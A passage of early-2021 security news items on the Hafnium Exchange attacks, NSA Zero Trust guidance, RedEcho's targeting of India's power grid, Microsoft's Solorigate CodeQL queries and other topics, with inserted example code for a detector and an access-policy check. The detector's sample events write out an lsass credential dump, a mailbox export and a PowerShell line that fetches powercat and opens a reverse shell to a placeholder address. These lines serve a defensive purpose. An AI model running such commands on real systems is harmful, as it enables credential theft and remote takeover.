The attackers were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users, according to the analysis.
“The good news for defenders is that the post-exploitation activity is very detectable,” said Katie Nickels, director of intelligence at Red Canary, via email, adding her firm has detected numerous attacks as well. “Some of the activity we observed uses the China Chopper web shell, which has been around for more than eight years, giving defenders ample time to develop detection logic for it.”
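Nickels' point that this tradecraft is detectable can be made concrete. The following Python is an added example, not code from Microsoft, Volexity or Red Canary: it runs one simple rule for each behaviour in the list above, plus a check for command shells spawned by the IIS worker process (how an ASPX web shell executes commands), over constructed process-creation events. The pipe-delimited event layout, host names, paths and the download URL are assumptions made for the example.

```python
"""Flag the Hafnium post-exploitation behaviours listed above in process-creation events.

Added example; not code from Microsoft, Volexity or Red Canary. The event format
(timestamp|host|parent_image|image|command_line) and the sample events are constructed
for this example and do not come from any real product or incident.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Rule:
    name: str
    image: str     # regex tested against the process image path (case-insensitive)
    cmdline: str   # regex tested against the full command line (case-insensitive)


# One rule per behaviour in Microsoft's list; the web shell check is separate below.
RULES: List[Rule] = [
    Rule("lsass-dump-procdump", r"procdump(64)?\.exe$", r"\blsass(\.exe)?\b"),
    Rule("staging-7zip", r"7z(a|g)?\.exe$", r"\s+a\s+.*\.zip\b"),   # '7z a <archive>.zip'
    Rule("exchange-snapin-export", r"powershell(\.exe)?$",
         r"Add-PSSnapin\s+Microsoft\.Exchange|New-MailboxExportRequest"),
    Rule("nishang-reverse-shell", r"powershell(\.exe)?$", r"Invoke-PowerShellTcpOneLine"),
    Rule("powercat-download", r"powershell(\.exe)?$",
         r"(github\.com|raw\.githubusercontent\.com)/\S*powercat"),
]

# An ASPX web shell runs inside the IIS worker process, so its commands appear as
# cmd.exe or powershell.exe children of w3wp.exe.
WEBSHELL_PARENT = re.compile(r"w3wp\.exe$", re.I)
SHELL_CHILD = re.compile(r"(cmd|powershell)(\.exe)?$", re.I)


def parse(line: str) -> Dict[str, str]:
    """Split one constructed event line into its five fields (command line may contain '|')."""
    ts, host, parent, image, cmdline = line.split("|", 4)
    return {"ts": ts, "host": host, "parent": parent, "image": image, "cmdline": cmdline}


def match_rules(ev: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event triggers (empty list if benign)."""
    hits = []
    if WEBSHELL_PARENT.search(ev["parent"]) and SHELL_CHILD.search(ev["image"]):
        hits.append("webshell-child-process")
    for r in RULES:
        if re.search(r.image, ev["image"], re.I) and re.search(r.cmdline, ev["cmdline"], re.I):
            hits.append(r.name)
    return hits


def scan(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (host, timestamp, rule) for every rule hit, in event order."""
    return [(ev["host"], ev["ts"], hit) for ev in map(parse, lines) for hit in match_rules(ev)]


# Constructed sample events: the first five mirror the listed behaviours, the last two are benign.
SAMPLE_EVENTS = [
    r"2021-03-02T10:01:05Z|EXCH01|C:\Windows\System32\inetsrv\w3wp.exe|C:\Windows\System32\cmd.exe|cmd.exe /c whoami",
    r"2021-03-02T10:02:11Z|EXCH01|C:\Windows\System32\cmd.exe|C:\Temp\procdump64.exe|procdump64.exe -accepteula -ma lsass.exe C:\Temp\l.dmp",
    r"2021-03-02T10:05:40Z|EXCH01|C:\Windows\System32\cmd.exe|C:\Program Files\7-Zip\7z.exe|7z.exe a -p C:\Temp\out.zip C:\Temp\*",
    r'2021-03-02T10:07:02Z|EXCH01|C:\Windows\System32\cmd.exe|powershell.exe|powershell.exe -c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; New-MailboxExportRequest -Mailbox ceo -FilePath \\EXCH01\c$\Temp\ceo.pst"',
    r"2021-03-02T10:09:15Z|EXCH01|C:\Windows\System32\cmd.exe|powershell.exe|powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/example-org/powercat/master/powercat.ps1'); powercat -c 198.51.100.7 -p 443 -e cmd",
    r"2021-03-02T10:11:00Z|EXCH01|C:\Windows\System32\services.exe|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs",
    r"2021-03-02T10:12:30Z|WKS07|C:\Windows\explorer.exe|C:\Program Files\7-Zip\7z.exe|7z.exe x report.zip",
]

if __name__ == "__main__":
    for host, ts, rule in scan(SAMPLE_EVENTS):
        print(f"{ts} {host} {rule}")
```

The rules are deliberately narrow (tool name plus the argument that makes it abusive), so a legitimate 7-Zip extraction on a workstation produces no alert while the same binary archiving a staging folder on the Exchange server does. In a real deployment the parsing would be replaced by the EDR or Sysmon event schema, and the web shell check alone is worth keeping: w3wp.exe spawning a shell is rare on a healthy Exchange server.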
Who is the Hafnium APT?
Hafnium has been tracked by Microsoft before, but the company has only just released a few details on the APT.
In terms of its tactics, “Hafnium has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control,” according to Microsoft. “Once they’ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA.”
Hafnium operates primarily from leased virtual private servers in the United States, and primarily goes after U.S. targets, but is linked to the Chinese government, according to Microsoft. It characterizes the APT as “a highly skilled and sophisticated actor.”
Time to Patch: Expect More Attacks Soon
It should be noted that other researchers say they have seen these vulnerabilities being exploited by different threat actors targeting other regions, according to Narang.
“We expect other threat actors to begin leveraging these vulnerabilities in the coming days and weeks, which is why it is critically important for organizations that use Exchange Server to apply these patches immediately,” he added.
And indeed, researchers at Huntress said they have discovered more than 100 web shells deployed across roughly 1,500 vulnerable servers, many of them with antivirus and endpoint detection and response (EDR) tooling installed, and expect this number to keep rising.
They’re not alone.
“FireEye has observed these vulnerabilities being exploited in the wild and we are actively working with several impacted organizations,” Charles Carmakal, senior vice president and CTO at FireEye Mandiant, said via email. “In addition to patching as soon as possible, we recommend organizations also review their systems for evidence of exploitation that may have occurred prior to the deployment of the patches.”
NSA embraces the Zero Trust Security Model
2.3.2021 BigBrothers Securityaffairs
The National Security Agency (NSA) published a document to explain the advantages of implementing a zero-trust model.
The National Security Agency (NSA) recently published a document to explain the benefits of adopting a zero-trust model, and advice to navigate the process.
Modern infrastructures are complex environments that combine multiple technologies and are exposed to sophisticated cyber threats.
A Zero Trust security model eliminates implicit trust in any entity inside or outside the organization's perimeter; instead, it requires every access request to be authenticated and authorized, wherever it originates.
“Zero Trust is a security model, a set of system design principles, and coordinated cybersecurity and system management strategy based on an acknowledgement that threats exist both inside and outside traditional network boundaries,” reads the document published by the NSA. “This security model eliminates implicit trust in any one element, node, or service and instead requires continuous verification of the operational picture via real-time information fed from multiple sources to determine access and other system responses.”
Zero Trust security model
This security model assumes a data-centric security approach and is based on security monitoring and granular risk-based access controls. The model applies the concept of least-privileged access for every resource and decision.
Adopting this approach for the modern, dynamic threat environment requires:
Coordinated and aggressive system monitoring, system management, and defensive operations capabilities.
Assuming all requests for critical resources and all network traffic may be malicious.
Assuming all devices and infrastructure may be compromised.
Accepting that all access approvals to critical resources incur risk, and being prepared to perform rapid damage assessment, control, and recovery operations.
For example, requiring strong multi-factor authentication of users in a Zero Trust environment can reduce the risk of a data breach.
Implementing this model is likely to be a gradual process that requires additional resources, capabilities, and strong executive commitment.
“NSA recommends embracing the Zero Trust security model when considering how to integrate Zero Trust concepts into an existing environment.” concludes the document. “Zero Trust efforts should be planned out as a continually maturing roadmap, from initial preparation to basic, intermediate, and advanced stages, with cybersecurity protection, response, and operations improving over time.”
AI Panel Urges US to Boost Tech Skills Amid China's Rise
2.3.2021 BigBrothers Securityweek
Artificial Intelligence
An artificial intelligence commission led by former Google CEO Eric Schmidt is urging the U.S. to boost its AI skills to counter China, including by pursuing “AI-enabled” weapons – something that Google itself has shied away from on ethical grounds.
Schmidt and current executives from Google, Microsoft, Oracle and Amazon are among the 15 members of the National Security Commission on Artificial Intelligence, which released its final report to Congress on Monday.
“To win in AI we need more money, more talent, stronger leadership,” Schmidt said Monday.
The report says that machines that can “perceive, decide, and act more quickly” than humans and with more accuracy are going to be deployed for military purposes — with or without the involvement of the U.S. and other democracies. It warns against unchecked use of autonomous weapons but expresses opposition to a global ban.
It also calls for “wise restraints” on the use of AI tools such as facial recognition that can be used for mass surveillance.
“We have to develop technology that preserves our Western values, but we have to be prepared for a world in which not everyone is doing that,” said Andrew Moore, a commissioner and the head of Google Cloud AI.
The group has the ear of top lawmakers from both parties, but has attracted criticism for including many members who work for tech companies with big government contracts, and who thus have a lot at stake in federal rules on emerging technology.
The report calls for a “White House-led strategy” to defend against AI-related threats, to set standards on how intelligent machines can be used responsibly and to boost U.S. research and development to maintain the nation’s technological advantage over China.
“We believe we are one or two years ahead of China, not five or 10,” Schmidt told the Senate Armed Services Committee last week. He clarified Monday that that he was expressing his personal opinions and not necessarily those of the commission.
It’s not yet clear whether President Joe Biden’s administration is on board with the commission’s approach. It’s still awaiting confirmation of a new director for the White House Office of Science and Technology Policy, which Biden has elevated to a Cabinet-level position.
“AI policy tends to be very bipartisan,” said Michael Kratsios, who was U.S. chief technology officer under President Donald Trump and led a push to pump more resources into AI development across federal agencies. The greatest imperative, he said, is that “the next great AI technologies are developed in the West.”
One big difference between the two administrations is likely to be the approach to building AI talent. The commission recommends a more open immigration policy than what Trump favored.
Congress formed the AI panel in 2018 and appointed 12 of its 15 commissioners, with the others picked by Trump’s Defense and Commerce secretaries. A judge later compelled the commission to make its meetings and records more accessible to the public after a civil liberties group, the Electronic Privacy Information Center, challenged its secrecy.
It’s been led by Schmidt, who was Google’s CEO and later the executive chairman of its parent company Alphabet. He previously helped lead the Defense Innovation Board, which advises the Pentagon on new technology.
That brought some conflict in 2018 when Google backed out of Project Maven, a U.S. military initiative using AI-based computer vision technology to analyze drone footage in conflict zones. The company, responding to internal activism from employees, also pledged not to use AI in any weapons-related applications.
“I did not agree with the Google decisions on Maven,” Schmidt told senators last week, calling it an “aberration” compared to the tech industry as a whole, where he says there are plenty of companies that want to work with the military. He said AI and machine vision systems are particularly good at “watching for things,” which is something the military spends a lot of time doing.
The commission also includes executives like Safra Catz, the CEO of software giant Oracle, and Amazon’s incoming CEO, Andy Jassy, who currently runs its cloud computing division, as well as top AI experts at Microsoft and Google. All four companies have competed against each other for federal cloud computing contracts. The representatives from Microsoft and Google joined other members in approving the final report Monday, but abstained from the section relating to government partnerships with the private sector.
Excluding human rights groups and rank-and-file tech experts from the commission has led the group to more easily frame this policy issue as a “democracy versus authoritarianism” competition against China while skirting more difficult topics, like the use of AI technologies on the U.S.-Mexico border, said Jack Poulson, a former Google researcher who now directs industry watchdog Tech Inquiry.
“The nominal reason to have these tech CEOs on these committees is they’re experts in the technology. But they’re also, subject to shareholder requirements, acting in the interests of their companies,” Poulson said. “They don’t want significant regulation or antitrust enforcement.”
The government-industry partnership may be important for the U.S. and its allies to help set standards for the responsible use of AI, said Megan Lamberth, a research associate at the Center for a New American Security.
“AI has the potential to really transform not only how militaries fight wars, but how economies operate and how societies and people interact with each other,” Lamberth said. “If there’s a gap in leadership, another country is going to fill that void.”
The American Civil Liberties Union said in a statement Monday that the commission made useful recommendations but it should have gone further by establishing civil rights protections now, before AI systems are widely deployed by intelligence agencies and the military.
The commission asked Congress to make new laws requiring federal agencies to conduct human rights assessments of new AI systems used on Americans. But it didn’t recommend the binding surveillance limits sought by activists.
US Right-Wing Platform Gab Acknowledges it Was Hacked
2.3.2021 BigBrothers Securityweek
The CEO of Gab, a social network favored by the US political right, said the platform had been attacked by "demon hackers" after an activist group released user data described as an important resource for research on the far right.
The activist group called DDoSecrets Collective released the data over the weekend to Wired magazine, claiming it offered "a record of the culture" related to the violent siege of the US Capitol on January 6.
The data included passwords and private messages on thousands of accounts.
Gab chief executive Andrew Torba claimed in a Twitter message Sunday that "demon hackers (I'm very serious) are attacking Gab right now," also calling members of the group "mentally ill" and using a slur to refer to them as members of the trans community.
"The same people behind this attack targeted law enforcement officers and their families last summer," Torba wrote, adding that the company was working with authorities to investigate.
The activist group denied Torba's allegations and said it would release the data to researchers and journalists.
"Our view is that data is a resource and a record," the collective said in a blog post.
A member of the collective told Wired that the data was a "gold mine of research for people looking at militias, neo-Nazis, the far right, QAnon, and everything surrounding January 6."
The group's website said the data was "an important sociological resource" and "a record of the culture and the exact statements surrounding not only an increase in extremist views and actions, but an attempted coup."
Gab is one of several platforms which have attracted large numbers of conservatives by steering clear of the moderation efforts imposed by Facebook and Twitter, which banned former president Donald Trump and some of his supporters for inciting violence.
NSA Publishes Guidance on Adoption of Zero Trust Security
2.3.2021 BigBrothers Securityweek
The U.S. National Security Agency (NSA) has published guidance on how security professionals can secure enterprise networks and sensitive data by adopting a Zero Trust security model.
Titled “Embracing a Zero Trust Security Model,” the document details the benefits and challenges of the security model, and also provides a series of recommendations on the implementation of Zero Trust within existing networks.
Leveraging a set of system design principles and a cyber-security management strategy, the Zero Trust model assumes that a breach has occurred or is inevitable and eliminates trust in systems, nodes, and services, requiring continuous verification through real-time information.
Zero Trust allows administrators to limit access and control the manner in which devices, processes, and users engage with data, to eliminate the abuse of compromised credentials, along with remote exploitation, and insider threats.
“Systems that are designed using Zero Trust principles should be better positioned to address existing threats, but transitioning to such a system requires careful planning to avoid weakening the security posture along the way. NSA continues to monitor the technologies that can contribute to a Zero Trust solution and will provide additional guidance as warranted,” the NSA notes.
Addressing the modern threat environment, the agency says, requires aggressive system monitoring and management, defensive operations capabilities, assuming requests for critical resources may be malicious, assuming the compromise of any device or infrastructure, accepting the risks associated with access to critical resources, and preparedness for rapid damage assessment and remediation.
With Zero Trust, every user, application/workload, device, and data flow is considered untrusted and access is denied by default, resources are protected and operated with the assumption that they might have been compromised, and access to all resources is provided in a secure manner.
The design of a Zero Trust solution, the NSA notes, implies defining mission outcomes, first protecting Data/Assets/Applications/Services (DAAS) and securing access paths, determining who needs access to the DAAS, creating control policies, and constantly looking for suspicious activity through full visibility into all activity (the inspection of all traffic logs).
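To make the principles in this summary and in the Securityaffairs write-up of the same document earlier on this page concrete (deny by default, least privilege per resource, assume any device may be compromised, re-verify every access rather than trusting a session), here is an added Python example of a policy decision function. It is not code from the NSA document; the signal names, thresholds and the sample subject, device and resource are assumptions constructed for illustration.

```python
"""Default-deny access decisions with continuous re-verification, in the spirit of the
NSA Zero Trust guidance summarised above.

Added example, not code from the NSA document. Signal names, thresholds and the sample
subject, device and resource are assumptions constructed for illustration.
"""
from dataclasses import dataclass, replace
from typing import FrozenSet, List, Optional, Tuple


@dataclass(frozen=True)
class Subject:
    user: str
    roles: FrozenSet[str]
    device_id: str                     # device the session was established from
    mfa_verified_at: Optional[float]   # epoch seconds of last MFA proof, None if never


@dataclass(frozen=True)
class Device:
    device_id: str
    managed: bool
    attested_at: float                 # epoch seconds of last health attestation
    compromised: bool = False          # set by EDR/SOC when the host is flagged


@dataclass(frozen=True)
class Resource:
    name: str
    sensitivity: str                   # "critical" or "standard" (DAAS classification)
    allowed_roles: FrozenSet[str]
    max_mfa_age: int                   # seconds an MFA proof stays valid for this resource
    max_attestation_age: int           # seconds a device attestation stays valid


def decide(subject: Subject, device: Device, resource: Resource, action: str,
           now: float) -> Tuple[bool, List[str]]:
    """Evaluate one access request at time `now`. Access is denied unless every check
    passes; callers re-run this on every request, so no decision is cached across time."""
    reasons: List[str] = []

    # Identity and least privilege: the subject must hold a role the resource permits.
    if not subject.roles & resource.allowed_roles:
        reasons.append("role not authorised for resource")

    # Credential freshness: a live session is not proof of identity; MFA must be recent
    # relative to the sensitivity of what is being accessed.
    if subject.mfa_verified_at is None or now - subject.mfa_verified_at > resource.max_mfa_age:
        reasons.append("MFA missing or stale")

    # Device posture: assume compromise until proven otherwise, and re-check that proof.
    if device.device_id != subject.device_id:
        reasons.append("request device does not match session device")
    if not device.managed or device.compromised:
        reasons.append("device unmanaged or flagged compromised")
    if now - device.attested_at > resource.max_attestation_age:
        reasons.append("device attestation stale")

    # Action scope: modifying critical data needs an explicit elevated role.
    if action == "write" and resource.sensitivity == "critical" and "admin" not in subject.roles:
        reasons.append("write to critical resource requires admin role")

    return (not reasons, reasons)


# Constructed sample: a finance analyst reading the payroll database (critical DAAS).
T0 = 1_614_600_000.0  # arbitrary epoch reference for the example
PAYROLL = Resource("payroll-db", "critical", frozenset({"finance", "admin"}),
                   max_mfa_age=900, max_attestation_age=3600)
ANALYST = Subject("a.analyst", frozenset({"finance"}), "LAPTOP-17", mfa_verified_at=T0 - 300)
LAPTOP = Device("LAPTOP-17", managed=True, attested_at=T0 - 600)


def demo() -> dict:
    """Run the same session through several re-verifications and return each outcome."""
    return {
        "fresh_read": decide(ANALYST, LAPTOP, PAYROLL, "read", now=T0),
        # Same session two hours later: nothing else changed, but MFA and attestation aged out.
        "later_read": decide(ANALYST, LAPTOP, PAYROLL, "read", now=T0 + 7200),
        # EDR flags the laptop mid-session: valid credentials no longer help.
        "compromised_device": decide(ANALYST, replace(LAPTOP, compromised=True), PAYROLL, "read", now=T0),
        # Same credentials replayed from another device.
        "wrong_device": decide(ANALYST, replace(LAPTOP, device_id="KIOSK-02"), PAYROLL, "read", now=T0),
        # Reading is within role; writing critical data is not.
        "write_attempt": decide(ANALYST, LAPTOP, PAYROLL, "write", now=T0),
    }


if __name__ == "__main__":
    for name, (allowed, why) in demo().items():
        print(f"{name:20s} {'ALLOW' if allowed else 'DENY'} {why}")
```

The point of the example is the shape of the decision, not the particular thresholds: every request is evaluated against identity, credential freshness, device posture and action scope, and the only way to get an allow is for all of them to pass at the moment of the request. Stolen credentials from a flagged or unknown device fail, and an access that was fine an hour ago fails once its proofs age out, which is what "continuous verification" in the NSA text means in practice.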
The NSA also explains that implementing Zero Trust requires time and effort, and that additional capabilities are required to transition to a mature Zero Trust architecture, for full benefits. Furthermore, the agency says, it is not necessary to move to a mature Zero Trust architecture all at once, as such implementations mature over time, enabling defenders to keep up with threats.
Challenges faced when implementing Zero Trust may include the lack of full support within the enterprise, “possibly from leadership, administrators, or users,” scalability, the need to continuously apply access control decisions, and fatigue from constantly applying default-deny security policies.
“The Zero Trust mindset focuses on securing critical data and access paths by eliminating trust as much as possible, coupled with verifying and regularly re-verifying every allowed access. However, implementing Zero Trust should not be undertaken lightly and will require significant resources and persistence to achieve,” the NSA also points out.
US Shifts State Grant Focus to Extremism, Cyberthreats
2.3.2021 BigBrothers Securityweek
State and local governments will be required to spend a portion of nearly $1.9 billion in annual federal public safety grants on the fight against domestic extremism and improved cybersecurity, the Department of Homeland Security said Thursday.
The requirement reflects the security priorities of President Joe Biden’s new administration as it confronts a growing threat from extremists and the fallout from a suspected Russian hack of government and private-sector computer networks.
Secretary of Homeland Security Alejandro Mayorkas said it was the first time since the agency, which was created in response to the Sept. 11, 2001, terrorist attacks, had directed that domestic violent extremism be specified as a national priority in programs to help state and local law enforcement agencies respond to emergencies.
“Today the most significant terrorist threat facing the nation comes from lone offenders and small groups of individuals who commit acts of violence motivated by domestic extremist ideological beliefs,” Mayorkas said in announcing the shift.
State and local government agencies will still have leeway. DHS will require that 7.5% of the grants be devoted to detecting and protecting against domestic extremism and an equal portion for cybersecurity, including to conduct risk assessments and training.
DHS will also now prohibit using the grants to buy military equipment, including grenade launchers, bayonets and “weaponized” aircraft, Mayorkas said. The use of such weaponry, which became increasingly prevalent after the Sept. 11 attacks, has been criticized as unnecessary and leading to the militarization of local law enforcement.
Mayorkas said DHS will continue to support the purchase of equipment that has “demonstrable impact on enhancing the safety of law enforcement and members of the public,” without specifying what that might entail.
About half of the money covered comes from two widely used grants: the State Homeland Security Program and the Urban Area Security Initiative. Both are administered by the Federal Emergency Management Agency.
That translates into at least $77 million to address domestic extremism, funds that Mayorkas said can be used to improve intelligence sharing across state lines, training and public awareness. It’s not new money, since it was appropriated last year, and more is needed, but it will still be useful given the widespread nature of the threat, said Tom Warrick, a former DHS deputy assistant secretary for counterterrorism policy.
The requirement should “get state and local governments thinking creatively how to address these threats,” said Warrick, now with the Atlantic Council.
The set-aside for cybersecurity comes as U.S. authorities and private security firms are still working to determine the scope of the suspected Russian hack, a breach first detected in December of at least nine government agencies and about 100 companies. Local governments have also been increasingly targeted by ransomware attacks.
Concerns about domestic extremism have been mounting in recent years. DHS listed domestic violent extremism, particularly by white supremacists, as among the top threats facing the nation late last year, and in January for the first time used a national terrorist advisory to warn about domestic extremism.
The agency was also accused by a whistleblower, in a complaint that is still being investigated by the Office of the Inspector General, of downplaying the danger to avoid angering then-President Donald Trump.
In the wake of the Jan. 6 insurrection, Republicans and Democrats in Congress have called for increased focus on domestic extremism.
“The irrefutable fact is that the threat of right-wing and, more specifically, white nationalist terrorism has been growing for years,” Rep. Bennie Thompson, the chairman of the House Homeland Security Committee, said at a recent hearing. “The previous administration failed to address this threat appropriately, and on Jan. 6, we saw the result right here at the United States Capitol.”
Vendor Quickly Patches Serious Vulnerability in NATO-Approved Firewall
2.3.2021 BigBrothers Securityweek
A critical vulnerability discovered in a firewall appliance made by Germany-based cybersecurity company Genua could be useful to threat actors once they’ve gained access to an organization’s network, according to Austrian cybersecurity consultancy SEC Consult.
Genua Genugate is a firewall designed for protecting internal networks against external threats, segmenting internal networks, and protecting machine-to-machine communications.
The company claims its Genugate firewall is the only one in the world to receive a “highly resistant” rating from the German government, and says it’s compliant with NATO’s “NATO Restricted” and the European Union’s “RESTREINT UE/EU RESTRICTED” requirements for data protection. The vendor says its products have been used by major industrial, government, military and other critical infrastructure organizations.
However, this does not mean Genua’s firewalls are not affected by potentially serious vulnerabilities.
SEC Consult on Monday revealed that the Genugate firewall is affected by a critical authentication bypass vulnerability (CVE-2021-27215) in the product’s administration interfaces. An attacker who has network access to an administration interface can exploit the vulnerability to log in to the device’s admin panel as any user — including the root user — regardless of the password they use.
“An attacker is able to gain full admin/root access rights within the admin web interface, which enables reconfiguration of the whole firewall, such as firewall ruleset, email filtering configuration, web application firewall settings, proxy settings, etc,” SEC Consult told SecurityWeek. “For instance, attackers could potentially change the configuration to access otherwise unreachable systems or reroute company traffic to an attacker-controlled proxy server.”
SEC Consult clarified in its advisory, “Certified and approved environments mandate that the admin interface is only reachable through a strictly separated network. Nevertheless, it is a highly critical security vulnerability and must be patched immediately.”
The vulnerability was discovered by Armin Stock of Atos Germany — IT services giant Atos acquired SEC Consult last year. The findings were reported to the vendor in late January 2021 and a patch was released just a few days later. The vulnerability appears to affect all versions of the firewall.
SecurityWeek has reached out to Genua for comment, but the company has yet to respond.
SEC Consult has published an advisory describing the vulnerability, but it has not made public proof-of-concept (PoC) code. The company has also posted a video showing how an attack works.
Chinese Hackers Targeted India's Power Grid Amid Geopolitical Tensions
2.3.2021 BigBrothers Thehackernews
Amid heightened border tensions between India and China, cybersecurity researchers have revealed a concerted campaign against India's critical infrastructure, including the nation's power grid, from Chinese state-sponsored groups.
The attacks, which coincided with the standoff between the two nations in May 2020, targeted a total of 12 organizations, 10 of which are in the power generation and transmission sector.
"10 distinct Indian power sector organizations, including four of the five Regional Load Despatch Centres (RLDC) responsible for operation of the power grid through balancing electricity supply and demand, have been identified as targets in a concerted campaign against India's critical infrastructure," Recorded Future said in a report published yesterday. "Other targets identified included 2 Indian seaports."
Chief among the victims include a power plant run by National Thermal Power Corporation (NTPC) Limited and New Delhi-based Power System Operation Corporation Limited.
Pinning the intrusions on a new group dubbed "RedEcho," investigators from the cybersecurity firm's Insikt Group said the malware deployed by the threat actor shares strong infrastructure and victimology overlaps with other Chinese groups APT41 (aka Barium, Winnti, or Wicked Panda) and Tonto Team.
Border conflicts have flared up since last year after deadly clashes between Indian and Chinese soldiers in Ladakh's Galwan Valley. While 20 Indian soldiers were killed in the clashes, China formally identified four casualties on its side for the first time on February 19.
In the intervening months, the Indian government has banned over 200 Chinese apps for allegedly engaging in activities that posed threats to "national security and defence of India, which ultimately impinges upon the sovereignty and integrity of India."
Noting that the standoff between the two countries was accompanied by increased espionage activity on both sides, Recorded Future said the attacks from China involved the use of infrastructure it tracks as AXIOMATICASYMPTOTE, which encompasses a modular Windows backdoor called ShadowPad that has been previously attributed to APT41 and subsequently shared between other Chinese state-backed actors.
Additionally, the report also raises questions about a possible connection between the skirmishes and a power blackout that crippled Mumbai last October.
While an initial probe conducted by the cyber department of the western Indian state of Maharashtra traced the outage to an unspecified piece of malware found at a Padgha-based State Load Despatch Centre, the researchers said, "the alleged link between the outage and the discovery of the unspecified malware variant remains unsubstantiated."
"However, this disclosure provides additional evidence suggesting the coordinated targeting of Indian Load Despatch Centres," they added.
Interestingly, these cyberattacks were described as originating from Chengdu, which is also the base for a network technology firm called Chengdu 404 Network Technology Company that operated as a front for a decade-long hacking spree targeting more than 100 high-tech and online gaming companies.
But it's not just China. In the weeks leading to the clashes in May, a state-sponsored group called Sidewinder — which operates in support of Indian political interests — is said to have singled out Chinese military and government entities in a spear-phishing attack using lures related to COVID-19 or the territorial disputes between Nepal, Pakistan, India, and China.
The modus operandi aside, the finding is yet another reminder of why critical infrastructure continues to be a lucrative target for an adversary looking to cut off access to essential services used by millions of people.
"The intrusions overlap with previous Indian energy sector targeting by Chinese threat activity groups in 2020 that also used AXIOMATICASYMPTOTE infrastructure," the researchers concluded. "Therefore, the focus in targeting India's electricity system possibly indicates a sustained strategic intent to access India's energy infrastructure."
We have reached out to India's Computer Emergency Response Team (CERT-IN), and we will update the story if we hear back.
EU leaders aim at boosting defense and security, including cybersecurity
1.3.2021 BigBrothers Securityaffairs
During a video conference of the members of the European Council, EU leaders agreed on a new strategy aimed at boosting defense and security.
During the recent video conference of the members of the European Council (25-26 February 2021), NATO chief Jens Stoltenberg highlighted the importance of defining a strategy to boost defense and security.
“We want to act more strategically, to defend our interests and to promote our values.” said Charles Michel, President of the European Council. “We will step up our cooperation and our coordination to combat hybrid threats and disinformation.”
Member states highlighted the importance of close cooperation with NATO and strengthening partnerships with the UN and key regional partners. The EU leaders emphasized that they looked forward to cooperating with the new US administration on a strong and ambitious transatlantic agenda that included a close dialogue on security and defence.
Participants are committed to providing secure European access to space, cyberspace and the high seas.
“In light of the growing number and complexity of cyber threats, we aim to strengthen European cyber resilience and responsiveness and to improve the cybersecurity crisis management framework. Following the Cybersecurity Strategy presented in December 2020, we invite the Commission and the High Representative to report on implementation by June 2021.” reads a statement from EU leaders. “In addition, we invite the co-legislators to swiftly take work forward, particularly on the revised Directive on security of network and information systems (NIS 2 Directive). We also call for greater cooperation and coordination to prevent and respond to hybrid threats, including disinformation, inter alia by involving the private sector and relevant international actors.”
EU leaders invited the Commission and the High Representative, Josep Borrell, to work on the implementation of the Cybersecurity Strategy by June 2021.
The 27 leaders discussed how to increase the resilience of their infrastructure to cyberattacks and hybrid threats.
“Second, we face new kinds of threats, cyber, hybrid, and disinformation. And we need to strengthen our resilience, we also need to adapt our tools,” Michel added.
The participants were concerned about the risks associated with cyberattacks and the rise of China.
“The EU efforts are going hand in hand with the military efforts across the continent,” said Stoltenberg. “For NATO, the main task during this pandemic has been to make sure that a health crisis doesn’t turn into a security crisis, because the threats we are faced with before the pandemic, they are still there: Russia’s aggressive actions, more brutal forms of terrorism, sophisticated cyber attacks, the rise of China and the security implications of climate change.”
Microsoft releases open-source CodeQL queries to assess Solorigate compromise
27.2.2021 BigBrothers Securityaffairs
Microsoft announced the release of the open-source CodeQL queries that its experts used during the investigation into the SolarWinds supply-chain attack.
Microsoft has announced the availability of open-source CodeQL queries that the IT giant used during its investigation into the SolarWinds attack.
In early 2021, the US agencies FBI, CISA, ODNI, and the NSA released a joint statement that blames Russia for the SolarWinds supply chain attack.
The four agencies were part of the Cyber Unified Coordination Group (UCG), a task force charged with coordinating the investigation and remediation of the SolarWinds hack, which had a significant impact on federal government networks.
The UCG said the attack was orchestrated by an Advanced Persistent Threat (APT) actor, likely Russian in origin.
According to security experts, Russia-linked threat actors compromised SolarWinds in 2019 and used the Sunspot malware to insert the Sunburst backdoor into builds of the SolarWinds Orion monitoring product, poisoning its supply chain.
Microsoft, which was hit by the attack, published continuous updates on its investigation, and now released the source code of CodeQL queries, which were used by its experts to identify indicators of compromise (IoCs) associated with Solorigate.
“In this blog, we’ll share our journey in reviewing our codebases, highlighting one specific technique: the use of CodeQL queries to analyze our source code at scale and rule out the presence of the code-level indicators of compromise (IoCs) and coding patterns associated with Solorigate.” reads the blog post published by Microsoft. “We are open sourcing the CodeQL queries that we used in this investigation so that other organizations may perform a similar analysis. Note that the queries we cover in this blog simply serve to home in on source code that shares similarities with the source in the Solorigate implant, either in the syntactic elements (names, literals, etc.) or in functionality.”
Microsoft pointed out that these queries should be considered as just a part of the arsenal of tools to use in the investigation.
There is no guarantee that attackers will reuse exactly the same functionality or coding style in other attacks, so the queries may fail to detect implants in other environments.
Microsoft also noted that, to rule out false positives, the query results would still require manual review.
CodeQL is a semantic code analysis engine that works in two distinct stages. In the first stage, as part of compiling the source code into binaries, CodeQL builds a database that captures a model of the code being compiled; for interpreted languages, it parses the source and builds its own abstract syntax tree model. In the second stage, that database is queried repeatedly. The CodeQL language makes it easy to select complex code conditions from the database.
Microsoft is open-sourcing several C# queries that can be used to assess code for the code-level IoCs, and it also provided detailed information on each query and the IoCs it targets.
“The queries we shared in this blog and described in Solorigate-Readme.md target patterns specifically associated with the Solorigate code-level IoCs, but CodeQL also provides many other options to query for backdoor functionality and detection-evasion techniques.” concludes Microsoft.
“These queries were relatively quick to author, and we were able to hunt for patterns much more accurately across our CodeQL databases and with far less effort to manually review the findings, compared to using text searches of source code. CodeQL is a powerful developer tool, and our hope is that this post inspires organizations to explore how it can be used to improve reactive security response and act as a compromise detection tool.”
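An illustration of what such a code-level IoC query looks like, added here and not one of the queries Microsoft released: it flags C# methods that combine the 64-bit FNV-1a constants with the XOR-and-multiply step of that hash, a name-hashing pattern that public analyses of the Sunburst implant documented. The query id, the predicate names and the choice of constants are this example's own assumptions.

```ql
/**
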